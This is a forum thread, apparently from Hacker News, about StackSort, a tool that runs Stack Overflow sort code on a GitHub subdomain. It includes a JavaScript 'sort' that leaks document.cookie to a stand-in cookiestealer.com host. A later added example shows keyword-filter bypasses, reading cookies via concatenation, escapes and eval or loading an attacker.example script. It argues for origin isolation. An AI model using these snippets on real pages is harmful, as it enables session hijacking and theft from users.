
Quick someone write a 'sort' that steals github session cookies. ;P


I only search answers posted before the comic was released for this reason :) (Also, I block any code that uses the word "cookie")

Plus, I'm assuming that since they let anyone run arbitrary code on subdomains, they've thought this through.


> Also, I block any code that uses the word "cookie"

That is so incredibly ineffective that you could just as well leave it out. Maybe have a look at https://github.com/jterrace/js.js for a sandboxed environment.


Quick, someone edit your code that has "javascript" and "sort" as keywords so it steals session cookies!


This won't work on Github's subdomain, but you'd do it like this:

  // Requires jQuery ($) on the page; loads a remote script with the
  // victim's document.cookie leaked in the query string, then sorts as asked.
  function sort(data) {
     $('body').append('<script src="http://cookiestealer.com/log.js?cookie=' + document.cookie + '"></script>');
     return data.sort();
  }


Dammit, just as I was about to write a

function sortArray(a) { alert('Hello StackSort!') }

Question/Answer. =( Good foresight!


I also don't allow alerts :)


This is a really cool script you've written and made me laugh out loud.

It would be a shame though if someone edited / republished / whatever an old script and used it to steal people's github cookies (your code wouldn't be able to filter someone calling a remote script which then ran its own code, for instance, or a script that evaled a new script based on a string / unicode, etc.)

It might be best to just run the code in a frame that's not hosted on Github then you're safe.
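The bypasses the comment above lists (a remote script, an eval of a built-up string, escaped characters) are easy to show concretely. The following is an added example, not code from the thread or from StackSort: a keyword blocklist like the one the author describes ("cookie", "alert") beside four snippets that never contain either word yet still read `document.cookie` or pull a remote script that would. The `document` stub, the function names and the `attacker.example` host are constructed for the example so it runs in Node without a browser.

```javascript
// Added example: a naive keyword blocklist versus payloads that evade it.
// All names here are hypothetical; the `document` stub is constructed for
// the example and is not a real DOM.

const BLOCKED_WORDS = ['cookie', 'alert'];

// The check from the thread: reject source text containing a blocked word.
// Returns true when the snippet would be allowed to run.
function naiveFilterAllows(source) {
  const lower = source.toLowerCase();
  return !BLOCKED_WORDS.some((word) => lower.includes(word));
}

// Minimal stand-in for the browser `document` that records what untrusted
// code touched: whether the cookie getter fired and which script URLs were
// appended to the body.
function makeDocumentStub() {
  const log = { cookieRead: false, scriptSrcs: [] };
  const doc = {
    get cookie() {
      log.cookieRead = true;
      return 'session=SECRET'; // constructed placeholder, not a real cookie
    },
    createElement(tag) {
      return { tag, src: '' };
    },
    body: {
      appendChild(el) {
        if (el.tag === 'script') log.scriptSrcs.push(el.src);
      },
    },
  };
  return { doc, log };
}

// Run an untrusted snippet with the stub bound to its `document` identifier.
function runSnippet(source) {
  const { doc, log } = makeDocumentStub();
  new Function('document', source)(doc);
  return log;
}

// Each payload passes the blocklist. The first three reach the cookie through
// string building, an escaped character and a direct eval; the fourth loads
// a remote script (hypothetical host) whose body the filter never sees.
const PAYLOADS = {
  concat: "return document['coo' + 'kie'];",
  escaped: "return document['\\u0063ookie'];",
  evaled: "return eval('document.coo' + 'kie');",
  remote:
    "var s = document.createElement('script');" +
    "s.src = 'https://attacker.example/log.js';" +
    'document.body.appendChild(s);',
};

// For every payload: did the filter allow it, did it read the cookie,
// and did it pull in a remote script?
function evaluateFilter() {
  const results = {};
  for (const [name, source] of Object.entries(PAYLOADS)) {
    const log = runSnippet(source);
    results[name] = {
      allowed: naiveFilterAllows(source),
      cookieRead: log.cookieRead,
      loadedRemote: log.scriptSrcs.length > 0,
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.table(evaluateFilter());
}
```

Every row comes back `allowed: true` with either `cookieRead` or `loadedRemote` set, which is the point the comment makes: text filtering cannot decide what code will do. The remedy the comment suggests is the right one: run the fetched code on a different origin (a frame on a domain that holds no GitHub cookies), so the same-origin policy, not a word list, keeps `document.cookie` out of reach.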


I think they thought it through, but there are still issues:

https://news.ycombinator.com/item?id=5347430



